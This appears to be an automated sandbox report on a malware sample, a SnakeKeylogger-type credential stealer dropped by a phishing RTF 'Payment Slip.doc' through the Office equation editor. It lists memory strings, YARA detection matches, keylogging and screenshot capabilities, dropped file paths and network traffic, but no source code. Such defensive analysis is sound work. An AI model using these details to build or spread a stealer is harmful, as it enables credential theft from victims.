                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: vvndewepeter91026.exe, 00000008.00000002.914618854.00000000034B2000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000347A000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003566000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003458000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000352E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Initial sample is an obfuscated RTF file
                  Source: initial sampleStatic file information: Filename: Payment Slip.doc
                  Malicious sample detected (through community Yara rule)
                  Source: Payment Slip.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026604B5_2_0026604B
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026B1605_2_0026B160
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026A4085_2_0026A408
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026B5885_2_0026B588
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026B5985_2_0026B598
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026A8405_2_0026A840
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_0026AC785_2_0026AC78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023903A8_2_0023903A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002340F88_2_002340F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023390C8_2_0023390C
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002389588_2_00238958
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002331B18_2_002331B1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002372008_2_00237200
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002382788_2_00238278
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00234A9F8_2_00234A9F
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00239BC28_2_00239BC2
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002334828_2_00233482
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00234D6F8_2_00234D6F
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00233E288_2_00233E28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00235E708_2_00235E70
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023DEC88_2_0023DEC8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002367288_2_00236728
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002347D08_2_002347D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023DEB98_2_0023DEB9
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023D7308_2_0023D730
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023D7408_2_0023D740
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F00408_2_005F0040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F64408_2_005F6440
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F1C608_2_005F1C60
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F80608_2_005F8060
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F48108_2_005F4810
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F2C008_2_005F2C00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F90008_2_005F9000
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F48208_2_005F4820
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F0CC08_2_005F0CC0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F70C08_2_005F70C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F28E08_2_005F28E0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F8CE08_2_005F8CE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F38808_2_005F3880
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F0CB08_2_005F0CB0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F54A08_2_005F54A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F19408_2_005F1940
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F7D408_2_005F7D40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F35608_2_005F3560
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F45008_2_005F4500
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F61208_2_005F6120
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F25C08_2_005F25C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F89C08_2_005F89C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F41E08_2_005F41E0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F51808_2_005F5180
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F09A08_2_005F09A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F6DA08_2_005F6DA0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F32408_2_005F3240
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F4E608_2_005F4E60
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F5E008_2_005F5E00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F96358_2_005F9635
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F16208_2_005F1620
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F7A208_2_005F7A20
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F3EC08_2_005F3EC0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F5AE08_2_005F5AE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F06808_2_005F0680
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F6A808_2_005F6A80
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F22A08_2_005F22A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F86A08_2_005F86A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F4B408_2_005F4B40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F03608_2_005F0360
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F67608_2_005F6760
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F13008_2_005F1300
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F77008_2_005F7700
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F2F208_2_005F2F20
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F93208_2_005F9320
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F57C08_2_005F57C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F0FE08_2_005F0FE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F73E08_2_005F73E0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F1F808_2_005F1F80
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F83808_2_005F8380
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_005F3BA08_2_005F3BA0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006060788_2_00606078
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006087488_2_00608748
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060F0678_2_0060F067
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006020688_2_00602068
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00609A688_2_00609A68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006060688_2_00606068
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060F0788_2_0060F078
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006000408_2_00600040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00606E408_2_00606E40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060B2408_2_0060B240
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006040428_2_00604042
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006040508_2_00604050
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060B2508_2_0060B250
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00609A588_2_00609A58
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060E2208_2_0060E220
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060CA288_2_0060CA28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00602E308_2_00602E30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00606E328_2_00606E32
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060CA388_2_0060CA38
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00600E088_2_00600E08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00607C088_2_00607C08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060FA088_2_0060FA08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00604E088_2_00604E08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00608C108_2_00608C10
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060E2108_2_0060E210
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00604E188_2_00604E18
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006044E88_2_006044E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060E6E88_2_0060E6E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060A8C08_2_0060A8C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006032C88_2_006032C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006090C98_2_006090C9
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006072CA8_2_006072CA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060E6D78_2_0060E6D7
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006004D88_2_006004D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006072D88_2_006072D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006090D88_2_006090D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006044D88_2_006044D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006012A08_2_006012A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006080A08_2_006080A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006052A18_2_006052A1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060C0A88_2_0060C0A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006052B08_2_006052B0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060A8B08_2_0060A8B0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060D8808_2_0060D880
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060D8908_2_0060D890
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006012908_2_00601290
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006080908_2_00608090
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006037608_2_00603760
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006077618_2_00607761
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006009708_2_00600970
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006077708_2_00607770
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060C5708_2_0060C570
